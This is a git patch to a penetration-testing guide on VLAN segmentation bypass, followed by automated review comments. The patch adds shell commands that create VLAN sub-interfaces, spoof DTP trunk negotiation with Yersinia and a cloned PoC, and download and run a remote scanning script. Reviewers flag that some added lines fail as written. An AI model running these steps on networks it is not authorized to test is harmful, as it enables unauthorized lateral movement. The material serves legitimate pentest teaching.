From 8aacbc1dd1fe0c6bd64bc9210f7c6d89ed363248 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 18 Aug 2025 13:59:20 +0200 Subject: [PATCH] Update lateral-vlan-segmentation-bypass.md --- .../lateral-vlan-segmentation-bypass.md | 25 +++++++++++++++---- 1 file changed, 20 insertions(+), 5 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index 250e30159..0e04c9138 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -36,6 +36,10 @@ sudo vconfig add eth0 10 sudo vconfig add eth0 20 sudo vconfig add eth0 50 sudo vconfig add eth0 60 +sudo ifconfig eth0.10 up +sudo ifconfig eth0.20 up +sudo ifconfig eth0.50 up +sudo ifconfig eth0.60 up # Modern (ip-link – preferred) sudo modprobe 8021q @@ -43,6 +47,8 @@ sudo ip link add link eth0 name eth0.10 type vlan id 10 sudo ip link add link eth0 name eth0.20 type vlan id 20 sudo ip link set eth0.10 up sudo ip link set eth0.20 up +sudo dhclient -v eth0.50 +sudo dhclient -v eth0.60 ``` Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured: @@ -55,6 +61,8 @@ sudo dhclient -v eth0.20 Example for manually setting a static IP address on an interface (VLAN 10): ```bash +sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0 +# or sudo ip addr add 10.10.10.66/24 dev eth0.10 ``` 
@@ -76,18 +84,25 @@ Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer ```bash # Become a trunk using Yersinia (GUI) -$ sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking +sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking # Python PoC (dtp-spoof) -$ git clone https://github.com/fleetcaptain/dtp-spoof.git -$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable +git clone https://github.com/fleetcaptain/dtp-spoof.git +sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable ``` Recon helper (passively fingerprint the port’s DTP state): ```bash -$ wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py -$ sudo python3 dtpscan.py -i eth0 +sudo modprobe 8021q +sudo ip link add link eth0 name eth0.30 type vlan id 30 +sudo ip addr add 10.10.30.66/24 dev eth0.30 +sudo ip link set eth0.30 up + +# or + +wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py +sudo python3 dtpscan.py -i eth0 ``` Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.
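Review bot: in the `@@ -36,6 +36,10 @@` hunk the four added `sudo ifconfig eth0.NN up` lines fit the legacy `vconfig` block they sit in, but that block now creates and raises VLANs 10, 20, 50 and 60 while the `# Modern (ip-link – preferred)` block that follows, as far as the visible context shows, only creates and raises `eth0.10` and `eth0.20`; either trim the legacy list to 10 and 20 or add the matching `ip link add link eth0 name eth0.50 type vlan id 50` / `eth0.60` and `ip link set ... up` lines so the two variants stay interchangeable.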
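Review bot: in the `@@ -43,6 +47,8 @@` hunk, `sudo dhclient -v eth0.50` and `sudo dhclient -v eth0.60` are inserted into the `ip link` block, but that block only creates and raises `eth0.10` and `eth0.20`, so a reader following the modern path has no `eth0.50`/`eth0.60` and both calls fail; the DHCP step is also only introduced by the sentence after the fence ("Subsequently, an address request is made via DHCP") and already has its own block (the `sudo dhclient -v eth0.20` context at the next hunk). Move these two lines into that DHCP block beside the existing calls, and keep them only if the 50/60 sub-interfaces are created on both the legacy and modern paths.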
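Review bot: in the `@@ -55,6 +61,8 @@` hunk the static-address example now shows the `ifconfig` form and the `ip addr add` form separated by a bare `# or`; the earlier blocks label their variants (`# Modern (ip-link – preferred)`), so label these the same way, e.g. `# Legacy (ifconfig)` above the first line and `# Modern (ip – preferred)` above the second, so the reader knows which one is deprecated on current distributions. Both lines assign 10.10.10.66/24 to `eth0.10`, which matches the preceding prose line about VLAN 10.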
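Review bot: in the `@@ -76,18 +84,25 @@` hunk the block added under "Recon helper (passively fingerprint the port’s DTP state)" does not belong there: the four new lines (`sudo modprobe 8021q`, `sudo ip link add link eth0 name eth0.30 type vlan id 30`, `sudo ip addr add 10.10.30.66/24 dev eth0.30`, `sudo ip link set eth0.30 up`) create a tagged sub-interface and assign it an address, which is an active configuration step rather than passive fingerprinting, and the `# or` that follows wrongly presents `dtpscan.py` as an alternative to it. Sub-interface creation is what the closing sentence ("Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section") already points back to, so either drop the four lines here or move them under that sentence with a comment; VLAN 30 and 10.10.30.0/24 also appear nowhere else in the visible file, so say where those values come from. Dropping the `$ ` prompts on the `yersinia`, `git clone` and `dtp-spoof.py` lines is fine and matches the other blocks.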